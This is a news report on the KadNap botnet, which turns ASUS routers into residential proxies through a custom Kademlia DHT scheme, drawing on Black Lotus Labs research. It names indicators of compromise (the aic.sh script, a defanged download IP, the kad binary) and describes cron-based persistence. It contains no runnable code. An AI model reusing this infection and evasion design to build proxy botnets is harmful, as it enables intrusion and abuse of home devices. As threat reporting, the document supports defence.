A newly identified botnet, named KadNap, is specifically targeting ASUS routers and similar networking devices, transforming them into proxies for cybercriminal activities. Since its emergence in August 2025, the KadNap botnet has expanded to encompass approximately 14,000 devices, forming a peer-to-peer network that connects to command-and-control (C2) infrastructure through a customized version of the Kadmelia Distributed Hash Table (DHT) protocol. This decentralized architecture complicates efforts to identify and disrupt the C2 servers controlling the botnet.
According to researchers at Black Lotus Labs, the threat research division of Lumen Technologies, nearly half of the KadNap network is connected to C2 infrastructure specifically designed for ASUS-based bots. The remaining devices communicate with two other distinct control servers. The majority of infected devices are located in the United States, which accounts for approximately 60% of the total, with notable infections also reported in Taiwan, Hong Kong, and Russia.
The infection process begins when a device downloads a malicious script known as aic.sh from the IP address 212.104.141[.]140. This script establishes persistence by creating a cron job that executes every 55 minutes. The payload is an ELF binary called kad, which installs the KadNap client. Once activated, the malware identifies the host’s external IP address and contacts multiple Network Time Protocol (NTP) servers to gather the current time and system uptime.
To enhance its evasion capabilities, KadNap employs a modified version of the Kademlia-based DHT protocol. This technique conceals the IP addresses of its infrastructure within a peer-to-peer system, making traditional network monitoring less effective. The researchers state, “KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring.” Infected devices utilize the DHT protocol to locate and connect with a C2 server, complicating the efforts of cybersecurity professionals to identify and neutralize these threats.
Despite the decentralized nature of the protocol, Black Lotus Labs identified a consistent connection to two specific nodes before reaching the C2 servers. This anomaly reduces the ideal level of decentralization and may facilitate the identification of the control infrastructure.
The KadNap botnet has connections to the Doppelganger proxy service, which is believed to be a rebranding of the Faceless service previously associated with the TheMoon malware botnet. Doppelganger offers access to infected devices as residential proxies, which cybercriminals can use for various malicious activities such as launching distributed denial-of-service (DDoS) attacks, credential stuffing, and brute-force attacks.
In response to the rising threat posed by the KadNap botnet, Lumen Technologies has initiated proactive measures. At the time of this report, the company announced that it has “blocked all network traffic to or from the control infrastructure.” While this disruption applies only to Lumen’s network, the company plans to release a list of indicators of compromise to assist other organizations in mitigating the botnet’s impact on their networks.
As the cybersecurity landscape continues to evolve, the emergence of sophisticated botnets like KadNap underscores the need for vigilance and robust security measures to protect against increasingly complex cyber threats.